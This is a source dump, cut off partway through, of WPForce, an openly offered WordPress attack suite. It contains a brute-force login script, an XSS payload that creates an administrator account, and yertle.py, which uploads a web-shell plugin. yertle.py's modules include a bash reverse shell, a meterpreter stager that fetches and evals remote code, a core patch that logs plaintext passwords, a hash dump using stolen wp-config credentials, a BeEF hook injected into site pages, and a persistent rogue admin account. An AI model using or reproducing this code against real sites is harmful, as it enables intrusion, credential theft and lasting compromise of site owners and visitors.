├── shell.zip
├── reverse.zip
├── add_admin.js
├── LICENSE
├── README.md
├── wpforce.py
└── yertle.py


/shell.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/n00py/WPForce/HEAD/shell.zip


--------------------------------------------------------------------------------
/reverse.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/n00py/WPForce/HEAD/reverse.zip


--------------------------------------------------------------------------------
/add_admin.js:
--------------------------------------------------------------------------------
 1 | //Use this to exploit XSS to compromise the application.  
 2 | // just use the XSS payload of <script src=http://[MY_EVIL_SERVER]/add_admin.js>
 3 | //Host this file on your server 
 4 | url = "http://[TARGET]/wp-admin/user-new.php";
 5 | var login = "";
 6 | var pass = "";
 7 | var email =  "";
 8 | 
 9 | function httpGet(url)
10 | {
11 | 		    var xmlHttp = new XMLHttpRequest();
12 | 		    xmlHttp.open( "GET", url, false ); // false for synchronous request
13 | 		    xmlHttp.send( null );
14 | 		    return xmlHttp.responseText;
15 | }
16 | var all = httpGet(url);
17 | var nonce = all.split("name=\"_wpnonce_create-user\" value=\""); 
18 | var nonce = nonce[1].slice(0, 10); 
19 | var http = new XMLHttpRequest();
20 | var params = "action=createuser&_wpnonce_create-user=" + nonce + "&_wp_http_referer=%2Fwp-admin%2Fuser-new.php&user_login=" + login + "&email=" + email + "&first_name=&last_name=&url=&pass1=" + pass + "&pass1-text=" + pass + "&pass2=" + pass + "&pw_weak=on&role=administrator&createuser=Add+New+User";
21 | http.open("POST", url, true);
22 | http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
23 | http.send(params);
24 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 2-Clause License
 2 | 
 3 | Copyright (c) 2017, 
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | * Redistributions of source code must retain the above copyright notice, this
10 |   list of conditions and the following disclaimer.
11 | 
12 | * Redistributions in binary form must reproduce the above copyright notice,
13 |   this list of conditions and the following disclaimer in the documentation
14 |   and/or other materials provided with the distribution.
15 | 
16 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
17 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
18 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
19 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
20 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
21 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
22 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
23 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
24 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
25 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
26 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | ![Supported Python versions](https://img.shields.io/badge/python-2.7-blue.svg)
  2 | # WPForce - Wordpress Attack Suite 
  3 | 
  4 | ## ABOUT:
  5 | WPForce is a suite of Wordpress Attack tools.  Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found.  Yertle also contains a number of post exploitation modules.
  6 | 
  7 | For more information, visit the blog post here: 
  8 | https://www.n00py.io/2017/03/squeezing-the-juice-out-of-a-compromised-wordpress-server/
  9 | 
 10 | Blogs in other languages: 
 11 | 
 12 | Chinese -    www.mottoin.com/100381.html 
 13 | 
 14 | Portuguese - http://www.100security.com.br/wpforce/ 
 15 | 
 16 | Spanish -    http://www.1024megas.com/2017/05/wpforce-fuerzabruta-postexplotacion.html 
 17 |              
 18 |    https://esgeeks.com/como-hackear-sitio-wordpress-con-wpforce/
 19 | 
 20 | Russian -    https://hackware.ru/?p=2547
 21 | 
 22 | French -     https://securityhack3r.info/wpforce-brute-force-attack-tool-wordpress/ 
 23 | 
 24 | Turkish -    http://turkhackteam.org/web-server-guvenligi/1655005-wordpress-site-sizma-testi-part-1-a.html
 25 | 
 26 | 
 27 | ## FEATURES:
 28 | * Brute Force via API, not login form bypassing some forms of protection
 29 | * Can automatically upload an interactive shell
 30 | * Can be used to spawn a full featured reverse shell
 31 | * Dumps WordPress password hashes
 32 | * Can backdoor authentication function for plaintext password collection
 33 | * Inject BeEF hook into all pages
 34 | * Pivot to meterpreter if needed
 35 | 
 36 | 
 37 | ## INSTALL:
 38 | ```
 39 | Yertle requires the requests libary to run.
 40 | http://docs.python-requests.org/en/master/user/install/
 41 | ```
 42 | 
 43 | ## USAGE:
 44 | ```
 45 | python wpforce.py -i usr.txt -w pass.txt -u "http://www.[website].com"
 46 | 
 47 |    ,-~~-.___.       __        __ ____   _____
 48 |   / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 49 |  (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
 50 |   \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
 51 |      ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
 52 |     /  \-'~;   ||     |
 53 |    /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
 54 |  =(  _____||________|                 ~n00py~
 55 | 
 56 | Username List: usr.txt (3)
 57 | Password List: pass.txt (21)
 58 | URL: http://www[website].com
 59 | --------------------------
 60 | [xxxxxxxxxxxxx@gmail.com : xxxxxxxxxxxxx] are valid credentials!  - THIS ACCOUNT IS ADMIN
 61 | --------------------------
 62 | --------------------------
 63 | [xxxxxxxxxxxxx@icloud.com : xxxxxxxxxxxx] are valid credentials!
 64 | --------------------------
 65 |  100% Percent Complete
 66 | All correct pairs:
 67 | {'xxxxxxxxxxxxx@icloud.com': 'xxxxxxxxxxxxx', 'xxxxxxxxxxxxx@gmail.com': 'xxxxxxxxxxxxx'}
 68 | 
 69 |  -h, --help            show this help message and exit
 70 |   -i INPUT, --input INPUT
 71 |                         Input file name
 72 |   -w WORDLIST, --wordlist WORDLIST
 73 |                         Wordlist file name
 74 |   -u URL, --url URL     URL of target
 75 |   -v, --verbose         Verbose output. Show the attemps as they happen.
 76 |   -t THREADS, --threads THREADS
 77 |                         Determines the number of threads to be used, default
 78 |                         is 10
 79 |   -a AGENT, --agent AGENT
 80 |                         Determines the user-agent
 81 |   -d, --debug           This option is used for determining issues with the
 82 |                         script.
 83 | 
 84 | 
 85 | python yertle.py -u "[username]" -p "[password]" -t "http://www.[website].com" -i
 86 |      _..---.--.    __   __        _   _
 87 |    .'\ __|/O.__)   \ \ / /__ _ __| |_| | ___
 88 |   /__.' _/ .-'_\    \ V / _ \ '__| __| |/ _ \.
 89 |  (____.'.-_\____)    | |  __/ |  | |_| |  __/
 90 |   (_/ _)__(_ \_)\_   |_|\___|_|   \__|_|\___|
 91 |    (_..)--(.._)'--'         ~n00py~
 92 |       Post-exploitation Module for Wordpress
 93 | 
 94 | Backdoor uploaded!
 95 | Upload Directory: ebwhbas
 96 | os-shell>
 97 | 
 98 | 
 99 | 
100 |   -h, --help            show this help message and exit
101 |   -i, --interactive     Interactive command shell
102 |   -r, --reverse         Reverse Shell
103 |   -t TARGET, --target TARGET
104 |                         URL of target
105 |   -u USERNAME, --username USERNAME
106 |                         Admin username
107 |   -p PASSWORD, --password PASSWORD
108 |                         Admin password
109 |   -li IP, --ip IP       Listener IP
110 |   -lp PORT, --port PORT
111 |                         Listener Port
112 |   -v, --verbose         Verbose output.
113 |   -e EXISTING, --existing EXISTING
114 |                         Skips uploading a shell, and connects to existing
115 |                         shell
116 | 
117 | 
118 | ```
119 | 
120 | Yertle currently contains these modules:
121 | 
122 | ```
123 | Core Commands
124 | =============
125 |  
126 | Command                   Description
127 | -------                   -----------
128 | ?                         Help menu
129 | beef                      Injects a BeEF hook into website
130 | dbcreds                   Prints the database credentials
131 | exit                      Terminate the session
132 | hashdump                  Dumps all WordPress password hashes
133 | help                      Help menu
134 | keylogger                 Patches WordPress core to log plaintext credentials
135 | keylog                    Displays keylog file
136 | meterpreter               Executes a PHP meterpreter stager to connect to metasploit
137 | persist                   Creates an admin account that will re-add itself
138 | quit                      Terminate the session
139 | shell                     Sends a TCP reverse shell to a netcat listener
140 | stealth                   Hides Yertle from the plugins page
141 | ```
142 | 


--------------------------------------------------------------------------------
/wpforce.py:
--------------------------------------------------------------------------------
  1 | import re
  2 | import sys
  3 | import time
  4 | import socket
  5 | import urllib2
  6 | import argparse
  7 | import threading
  8 | from urlparse import urljoin
  9 | 
 10 | __author__ = 'n00py'
 11 | # These variables must be shared by all threads dynamically
 12 | correct_pairs = {}
 13 | total = 0
 14 | 
 15 | def has_colours(stream):
 16 |     if not hasattr(stream, "isatty"):
 17 |         return False
 18 |     if not stream.isatty():
 19 |         return False # auto color only on TTYs
 20 |     try:
 21 |         import curses
 22 |         curses.setupterm()
 23 |         return curses.tigetnum("colors") > 2
 24 |     except:
 25 |         return False
 26 | has_colours = has_colours(sys.stdout)
 27 | BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
 28 | 
 29 | 
 30 | def printout(text, colour=WHITE):
 31 |         if has_colours:
 32 |                 seq = "\x1b[1;%dm" % (30+colour) + text + "\x1b[0m"
 33 |                 sys.stdout.write(seq)
 34 |         else:
 35 |                 sys.stdout.write(text)
 36 | 
 37 | 
 38 | def slice_list(input, size):
 39 |     input_size = len(input)
 40 |     slice_size = input_size / size
 41 |     remain = input_size % size
 42 |     result = []
 43 |     iterator = iter(input)
 44 |     for i in range(size):
 45 |         result.append([])
 46 |         for j in range(slice_size):
 47 |             result[i].append(iterator.next())
 48 |         if remain:
 49 |             result[i].append(iterator.next())
 50 |             remain -= 1
 51 |     return result
 52 | 
 53 | 
 54 | def worker(wordlist,thread_no,url,userlist,verbose,debug,agent):
 55 |     global total
 56 |     global correct_pairs
 57 |     for n in wordlist:
 58 |         current_pass = wordlist.index(n)
 59 |         for x in userlist:
 60 |             current_user = userlist.index(x)
 61 |             user = userlist[current_user]
 62 |             password = wordlist[current_pass]
 63 |             if user not in correct_pairs:
 64 |                 if user != "":
 65 |                     if password != "":
 66 |                         PasswordAttempt(user,password,url,thread_no,verbose,debug,agent)
 67 |         total += 1
 68 | 
 69 | 
 70 | def BuildThreads(list_array,url,debug,userlist,verbose,agent):
 71 |     if debug:
 72 |         print "Here is the content of the wordlists for each thread"
 73 |         for i in range(len(list_array)):
 74 |             print "Thread " + str(i)
 75 |             printout(str(list_array[i]), YELLOW)
 76 |             print "\n-----------------------------------------------------"
 77 |     threads = []
 78 |     for i in range(len(list_array)):
 79 |         t = threading.Thread(target=worker, args=(list_array[i], i, url,userlist,verbose,debug,agent))
 80 |         t.daemon = True
 81 |         threads.append(t)
 82 |         t.start()
 83 | 
 84 | 
 85 | def PrintBanner(input,wordlist,url,userlist,passlist):
 86 |     banner = """\
 87 |        ,-~~-.___.       __        __ ____   _____
 88 |       / |  x     \      \ \      / /|  _ \ |  ___|___   _ __  ___  ___
 89 |      (  )        0       \ \ /\ / / | |_) || |_  / _ \ | '__|/ __|/ _ \.
 90 |       \_/-, ,----'  ____  \ V  V /  |  __/ |  _|| (_) || |  | (__|  __/
 91 |          ====      ||   \_ \_/\_/   |_|    |_|   \___/ |_|   \___|\___|
 92 |         /  \-'~;   ||     |                v.1.0.0
 93 |        /  __/~| ...||__/|-"   Brute Force Attack Tool for Wordpress
 94 |      =(  _____||________|                 ~n00py~
 95 |     """
 96 |     print banner
 97 |     print ("Username List: %s" % input) + " (" + str(len(userlist)) + ")"
 98 |     print ("Password List: %s" % wordlist) + " (" + str(len(passlist)) + ")"
 99 |     print ("URL: %s" % url)
100 | 
101 | 
102 | def TestSite(url):
103 |     protocheck(url)
104 |     print "Trying: " + url
105 |     try:
106 |         urllib2.urlopen(url, timeout=3)
107 |     except urllib2.HTTPError, e:
108 |         if e.code == 405:
109 |             print url + " found!"
110 |             print "Now the brute force will begin!  >:)"
111 |         if e.code == 404:
112 |             printout(str(e), YELLOW)
113 |             print " - XMLRPC has been moved, removed, or blocked"
114 |             sys.exit()
115 |     except urllib2.URLError, g:
116 |         printout("Could not identify XMLRPC.  Please verify the domain.\n", YELLOW)
117 |         sys.exit()
118 |     except socket.timeout as e:
119 |         print type(e)
120 |         printout("The socket timed out, try it again.", YELLOW)
121 |         sys.exit()
122 | 
123 | 
124 | def PasswordAttempt(user, password, url, thread_no,verbose,debug,agent):
125 |     global passlist
126 |     if verbose is True or debug is True:
127 |         if debug is True:
128 |             thready = "[Thread " + str(thread_no) + "]"
129 |             printout(thready, YELLOW)
130 |         print "Trying " + user + " : " + password + "\n",
131 |     headers = {'User-Agent': agent,
132 |                'Connection': 'keep-alive',
133 |                'Accept': 'text/html'
134 |                }
135 |     post = "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>" + user + "</string></value></param><param><value><string>" + password + "</string></value></param></params></methodCall>"
136 |     try:
137 |         req = urllib2.Request(url, post, headers)
138 |         response = urllib2.urlopen(req, timeout=3)
139 |         the_page = response.read()
140 |         look_for = "isAdmin"
141 |         try:
142 |             splitter = the_page.split(look_for, 1)[1]
143 |             correct_pairs[user] = password
144 |             print "--------------------------"
145 |             success = "[" + user + " : " + password + "] are valid credentials!  "
146 |             adminAlert = ""
147 |             if splitter[23] == "1":
148 |                 adminAlert = "- THIS ACCOUNT IS ADMIN"
149 |             printout(success, GREEN)
150 |             printout(adminAlert, RED)
151 |             print "\n--------------------------"
152 |         except:
153 |             pass
154 |     except urllib2.URLError, e:
155 |         if e.code == 404 or e.code == 403:
156 |             global total
157 |             printout(str(e), YELLOW)
158 |             print " - WAF or security plugin likely in use"
159 |             total = len(passlist)
160 |             sys.exit()
161 |         else:
162 |             printout(str(e), YELLOW)
163 |             print " - Try reducing Thread count "
164 |             if args.verbose is True or args.debug is True:
165 |                 print user + ":" + password + " was skipped"
166 |     except socket.timeout as e:
167 |         printout(str(e), YELLOW)
168 |         print " - Try reducing Thread count "
169 |         if args.verbose is True or args.debug is True:
170 |             print user + ":" + password + " was skipped"
171 |     except socket.error as e:
172 |         printout(str(e), YELLOW)
173 |         print " - Got an RST, Probably tripped the firewall\n",
174 |         total = len(passlist)
175 |         sys.exit()
176 | 
177 | 
178 | def protocheck(url):
179 |     url_pattern = re.compile("http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+")
180 |     if not url_pattern.match(url):
181 |         printout("Incorrect URL. Please include the protocol in the URL.\n", YELLOW)
182 |         sys.exit()
183 | 
184 | def main():
185 |     parser = argparse.ArgumentParser(description='This is a tool to brute force Worpress using the Wordpress API')
186 |     users = parser.add_mutually_exclusive_group(required=True)
187 |     users.add_argument('-i','--input', help='Input file name')
188 |     users.add_argument('-si' '--singleinput', help='Input list of users', action='store', dest='singleinput', nargs='+')
189 |     parser.add_argument('-w','--wordlist',help='Wordlist file name', required=True)
190 |     parser.add_argument('-u','--url',help='URL of target', required=True)
191 |     parser.add_argument('-v','--verbose',help=' Verbose output.  Show the attemps as they happen.', required=False, action='store_true')
192 |     parser.add_argument('-t','--threads',help=' Determines the number of threads to be used, default is 10', type=int, default=10, required=False)
193 |     parser.add_argument('-a','--agent',help=' Determines the user-agent', type=str, default="WPForce Wordpress Attack Tool 1.0", required=False)
194 |     parser.add_argument('-d','--debug',help=' This option is used for determining issues with the script.', action='store_true', required=False)
195 |     args = parser.parse_args()
196 |     
197 |     url = args.url
198 |     url = urljoin(url, 'xmlrpc.php')
199 | 
200 |     if args.input:
201 |         userlist = open(args.input, 'r').read().split('\n')
202 |     else:
203 |         printout("Remember to pass usernames in space delimited form!\n", YELLOW)
204 |         userlist = args.singleinput
205 | 
206 |     totalusers = len(userlist)
207 | 
208 |     passlist = open(args.wordlist, 'r').read().split('\n')
209 |     
210 |     PrintBanner(args.input,args.wordlist,args.url,userlist,passlist)
211 |     TestSite(url)
212 | 
213 |     list_array = slice_list(passlist, args.threads)
214 |     BuildThreads(list_array,url,args.debug,userlist,args.verbose,args.agent)
215 |     while (len(correct_pairs) <= totalusers) and (len(passlist) > total):
216 |             time.sleep(0.1)
217 |             sys.stdout.flush()
218 |             percent = "%.0f%%" % (100 * (total)/len(passlist))
219 |             print " " + percent + " Percent Complete\r",
220 |     
221 |     print "\nAll correct pairs:"
222 |     printout(str(correct_pairs), GREEN)
223 |     print ""
224 | 
225 | if __name__ == "__main__":
226 |     main()
227 | 


--------------------------------------------------------------------------------
/yertle.py:
--------------------------------------------------------------------------------
  1 | import re
  2 | import sys
  3 | import base64
  4 | import readline
  5 | import requests
  6 | import argparse
  7 | from random import choice
  8 | from string import ascii_lowercase
  9 | __author__ = '(n00py)'
 10 | 
 11 | 
 12 | def uploadbackdoor(host,username,password,type,verbose, agent):
 13 |     if host.endswith('/'):
 14 |         host = host[:-1]
 15 |     url = host + '/wp-login.php'
 16 |     headers = {'user-agent': agent,
 17 |                'Accept-Encoding' : 'none'
 18 |     }
 19 |     payload = {'log': username,
 20 |                'pwd': password,
 21 |                'rememberme': 'forever',
 22 |                'wp-submit': 'log In',
 23 |                'redirect_to': host + '/wp-admin/',
 24 |                'testcookie': 1,
 25 |                }
 26 |     uploaddir = (''.join(choice(ascii_lowercase) for i in range(7)))
 27 |     session = requests.Session()
 28 | 
 29 |     r = session.post(url, headers=headers, data=payload)
 30 |     if verbose is True:
 31 |         print "Server Header: " + r.headers['Server']
 32 |     if r.status_code == 200:
 33 |         if verbose is True:
 34 |             print "Found Login Page"
 35 |     r3 = session.get(host + '/wp-admin/plugin-install.php?tab=upload',headers=headers)
 36 |     if r3.status_code == 200:
 37 |         if verbose is True:
 38 |             print "Logged in as Admin"
 39 |     look_for = 'name="_wpnonce" value="'
 40 |     try:
 41 |         nonceText = r3.text.split(look_for, 1)[1]
 42 |         nonce = nonceText[0:10]
 43 |         if verbose is True:
 44 |             print "Found CSRF Token: " + nonce
 45 |     except:
 46 |         print "Didn't find a CSRF token, check the URL and/or credentials."
 47 |         sys.exit(2)
 48 | 
 49 |     files = {'pluginzip': (uploaddir + '.zip', open(type +'.zip', 'rb')),
 50 |              '_wpnonce': (None, nonce),
 51 |              '_wp_http_referer': (None, host + '/wp-admin/plugin-install.php?tab=upload'),
 52 |              'install-plugin-submit': (None,'Install Now')
 53 | 
 54 |              }
 55 |     r4 = session.post(host + "/wp-admin/update.php?action=upload-plugin",headers=headers, files=files)
 56 |     if r.status_code == 200:
 57 |         print "Backdoor uploaded!"
 58 |         if "Plugin installed successfully" in r4.text:
 59 |             if verbose is True:
 60 |                 print "Plugin installed successfully"
 61 | 
 62 |         if "Destination folder already exists" in r4.text:
 63 |             if verbose is True:
 64 |                 print "Destination folder already exists"
 65 |     print "Upload Directory: " + uploaddir
 66 |     return uploaddir
 67 | 
 68 | 
 69 | def commandloop(host,uploaddir):
 70 |     while True:
 71 |         cmd = raw_input('os-shell> ')
 72 |         params = [('cmd', cmd.encode('base64'))]
 73 |         if (cmd == "quit") or (cmd == "exit"):
 74 |             sys.exit(2)
 75 |         elif cmd == "help" or cmd == "?":
 76 |             print '''
 77 |             Core Commands
 78 |             =============
 79 | 
 80 |                 Command                   Description
 81 |                 -------                   -----------
 82 |                 ?                         Help menu
 83 |                 beef                      Injects a BeEF hook into website
 84 |                 dbcreds                   Prints the database credentials
 85 |                 exit                      Terminate the session
 86 |                 hashdump                  Dumps all WordPress password hashes
 87 |                 help                      Help menu
 88 |                 keylogger                 Patches WordPress core to log plaintext credentials
 89 |                 keylog                    Displays keylog file
 90 |                 meterpreter               Executes a PHP meterpreter stager to connect to metasploit
 91 |                 persist                   Creates an admin account that will re-add itself
 92 |                 quit                      Terminate the session
 93 |                 shell                     Sends a TCP reverse shell to a netcat listener
 94 |                 stealth                   Hides Yertle from the plugins page
 95 | 
 96 |                 '''
 97 |         elif cmd == "hashdump":
 98 |             hashdump(host, uploaddir)
 99 |         elif cmd == "shell":
100 |             shell(host, uploaddir)
101 |         elif cmd == "stealth":
102 |             stealth(host, uploaddir)
103 |         elif cmd == "keylogger":
104 |             keylogger(host, uploaddir)
105 |         elif cmd == "keylog":
106 |             keylog(host, uploaddir)
107 |         elif cmd == "meterpreter":
108 |             meterpreter(host, uploaddir)
109 |         elif cmd == "beef":
110 |             beefhook(host, uploaddir)
111 |         elif cmd == "persist":
112 |             persist(host, uploaddir)
113 |         elif cmd == "dbcreds":
114 |             creds = datacreds(host, uploaddir)
115 |             print "Hostname: " + creds[0]
116 |             print "Username: " +creds[1]
117 |             print "Password: " +creds[2]
118 |             print "Database: " + creds[3]
119 |         else:
120 |             print "Sent command: " + cmd
121 |             sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
122 |             print sendcommand.text
123 | 
124 | 
125 | def reverseshell(host, ip, port,uploaddir):
126 |     params = [('ip', ip), ('port', port)]
127 |     print "Sending reverse shell to " + ip + " port " + port
128 |     sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/reverse.php", params=params)
129 | 
130 | 
131 | def datacreds(host,uploaddir):
132 |     params = [('cmd', 'cat ../../../wp-config.php'.encode('base64'))]
133 |     sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
134 |     user =  credextract(sendcommand.text, 'DB_USER')
135 |     password = credextract(sendcommand.text, 'DB_PASSWORD')
136 |     host = credextract(sendcommand.text, 'DB_HOST')
137 |     db = credextract(sendcommand.text, 'DB_NAME')
138 |     return host, user, password, db
139 | 
140 | 
141 | def credextract(list, key):
142 |     s = list
143 |     start = s.find(key)
144 |     end = s.find(';', start)
145 |     s = s[start:end]
146 |     se = s.split("'")
147 |     return se[2]
148 | 
149 | 
150 | def shell(host,uploaddir):
151 |     if safety(host, uploaddir):
152 |         ip = raw_input('IP Address: ')
153 |         port = raw_input('Port: ')
154 |         params = [('cmd', ('php -r \'$sock=fsockopen("' + ip + '",' + port + ');exec("/bin/bash -i <&3 >&3 2>&3");\'').encode('base64'))]
155 |         try:
156 |             print "Sending reverse shell to " + ip + " port " + port
157 |             requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params, timeout=1)
158 |         except requests.exceptions.Timeout:
159 |             pass
160 | 
161 | 
162 | def keylog(host,uploaddir):
163 |     params = [('cmd', ('cat passwords.txt').encode('base64'))]
164 |     sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
165 |     print sendcommand.text
166 | 
167 | 
168 | def stealth(host,uploaddir):
169 |     if safety(host, uploaddir):
170 |         hidden_shell = '''<?php
171 |     $command = $_GET["cmd"];
172 |     $command = substr($command, 0, -1);
173 |     $command = base64_decode($command);
174 | 
175 |     if (class_exists('ReflectionFunction')) {
176 |        $function = new ReflectionFunction('system');
177 |        $thingy = $function->invoke($command );
178 | 
179 |     } elseif (function_exists('call_user_func_array')) {
180 |        call_user_func_array('system', array($command));
181 | 
182 |     } elseif (function_exists('call_user_func')) {
183 |        call_user_func('system', $command);
184 | 
185 |     } else {
186 |        system($command);
187 |     }
188 | 
189 |     ?>
190 |     '''
191 |         payload = hidden_shell.encode('base64')
192 |         params = [
193 |             ('cmd', ('php -r \'echo base64_decode("' + payload + '");\' > shell.php').encode('base64'))]
194 |         requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
195 | 
196 | 
197 | def warning():
198 |     cmd = raw_input('This module modifies files within the WordPress core.  Would you like to continue? (Y/n) ')
199 |     if ("y" in cmd) or("Y" in cmd):
200 |         return True
201 |     else:
202 |         return False
203 | 
204 | 
205 | def meterpreter(host,uploaddir):
206 |     if safety(host, uploaddir):
207 |         ip = raw_input('IP Address: ')
208 |         port = raw_input('Port: ')
209 |         meter = '''<?php
210 |     error_reporting(0);
211 |     $ip   = '%s';
212 |     $port = %s;
213 |     if (($f = 'stream_socket_client') && is_callable($f)) {
214 |         $s      = $f("tcp://{$ip}:{$port}");
215 |         $s_type = 'stream';
216 |     } elseif (($f = 'fsockopen') && is_callable($f)) {
217 |         $s      = $f($ip, $port);
218 |         $s_type = 'stream';
219 |     } elseif (($f = 'socket_create') && is_callable($f)) {
220 |         $s   = $f(AF_INET, SOCK_STREAM, SOL_TCP);
221 |         $res = @socket_connect($s, $ip, $port);
222 |         if (!$res) {
223 |             die();
224 |         }
225 |         $s_type = 'socket';
226 |     } else {
227 |         die('no socket funcs');
228 |     }
229 |     if (!$s) {
230 |         die('no socket');
231 |     }
232 |     switch ($s_type) {
233 |         case 'stream':
234 |             $len = fread($s, 4);
235 |             break;
236 |         case 'socket':
237 |             $len = socket_read($s, 4);
238 |             break;
239 |     }
240 |     if (!$len) {
241 |         die();
242 |     }
243 |     $a   = unpack("Nlen", $len);
244 |     $len = $a['len'];
245 |     $b   = '';
246 |     while (strlen($b) < $len) {
247 |         switch ($s_type) {
248 |             case 'stream':
249 |                 $b .= fread($s, $len - strlen($b));
250 |                 break;
251 |             case 'socket':
252 |                 $b .= socket_read($s, $len - strlen($b));
253 |                 break;
254 |         }
255 |     }
256 |     $GLOBALS['msgsock']      = $s;
257 |     $GLOBALS['msgsock_type'] = $s_type;
258 |     eval($b);
259 |     die();
260 |     ?>
261 |     ''' % (ip, port)
262 |         payload = meter.encode('base64')
263 |         params = [
264 |             ('cmd', ('php -r \'echo base64_decode("' + payload + '");\' > meterpreter.php').encode('base64'))]
265 |         sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
266 |         params = [
267 |             ('cmd', 'php meterpreter.php'.encode('base64'))]
268 |         try:
269 |             print "Sending meterpreter stager to connect back to " + ip + ":" + port
270 |             sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params, timeout=1)
271 |         except requests.exceptions.Timeout:
272 |             pass
273 |         print sendcommand.text
274 | 
275 | 
276 | def keylogger(host,uploaddir):
277 |     if safety(host, uploaddir):
278 |         if warning():
279 |             hook = '''$credentials['remember'] = false;
280 |              $file = 'wp-content/plugins/%s/passwords.txt';
281 |              $credz = date('Y-m-d') . " - Username: " . $_POST['log'] . " && Password: " . $_POST['pwd'] . "\n";
282 |              file_put_contents($file, $credz, FILE_APPEND | LOCK_EX);''' % (uploaddir)
283 | 
284 |             hook = hook.encode('base64')
285 |             injector = '''<?php
286 |         $real = "JGNyZWRlbnRpYWxzWydyZW1lbWJlciddID0gZmFsc2U7";
287 |         $evil = "%s";
288 |         $real = base64_decode($real);
289 |         $evil = base64_decode($evil);
290 | 
291 |         $orig=file_get_contents('../../../wp-includes/user.php');
292 |         $orig=str_replace("$real", "$evil",$orig);
293 |         file_put_contents('../../../wp-includes/user.php', $orig);
294 |         ?>''' % hook
295 |             payload = injector.encode('base64')
296 |             params = [
297 |                 ('cmd', ('php -r \'echo base64_decode("' + payload + '");\' > backdoor.php').encode('base64'))]
298 |             requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
299 |             params = [
300 |                 ('cmd', 'php backdoor.php'.encode('base64'))]
301 |             requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
302 |             print "wp_signon function patched.  Do not run this more than once.  Use 'keylog' to check the log file."
303 | 
304 | 
305 | def hashdump(host,uploaddir):
306 |     items = datacreds(host, uploaddir)
307 |     dumper = '''<?php
308 | $servername = "%s";
309 | $username = "%s";
310 | $password = "%s";
311 | $dbname = "%s";
312 | 
313 | // Create connection
314 | $conn = new mysqli($servername, $username, $password, $dbname);
315 | // Check connection
316 | if ($conn->connect_error) {
317 |     die("Connection failed: " . $conn->connect_error);
318 | }
319 | 
320 | $sql = "SELECT ID, user_login, user_pass, user_email FROM wp_users";
321 | $result = $conn->query($sql);
322 | 
323 | if ($result->num_rows > 0) {
324 |     // output data of each row
325 |     while($row = $result->fetch_assoc()) {
326 |         echo "ID: " . $row["ID"]. "  - Username: " . $row["user_login"]. "  Password: " . $row["user_pass"]. "  Email: " . $row["user_email"]. "\n";
327 |     }
328 | } else {
329 |     echo "0 results";
330 | }
331 | $conn->close();
332 | ?> ''' % (items[0], items[1], items[2], items[3])
333 |     payload = dumper.encode('base64')
334 |     if safety(host, uploaddir):
335 |         params = [
336 |         ('cmd', ('php -r \'echo base64_decode("' + payload + '");\' > hashdump.php').encode('base64'))]
337 |         sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
338 |         params = [
339 |         ('cmd', 'php hashdump.php'.encode('base64'))]
340 |         sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
341 |         print sendcommand.text
342 | 
343 | 
344 | def beefhook(host,uploaddir):
345 |     if warning():
346 |         ip = raw_input('IP Address: ')
347 |         params = [
348 |             ('cmd',('sed -i \'1i\<script src=\"http://' + ip + ':3000/hook.js\"\>\</script\>\'  ../../../wp-blog-header.php').encode('base64'))]
349 |         sendcommand = requests.get(host + "/wp-content/plugins/" + uploaddir + "/shell.php", params=params)
350 |         print "BeEF hook added!  Check BeEF for any hooked clients. Do not run this multiple times."
351 | 
352 | def persist(host,uploaddir):
353 |     if safety(host, uploaddir):
354 |         username = raw_input('Username: ')
355 |         email = raw_input('Email: ')
356 |         password = raw_input('Password: ')
357 |         evilcode = '''
358 |         $new_user = '%s';
359 |         $new_user_email = '%s';
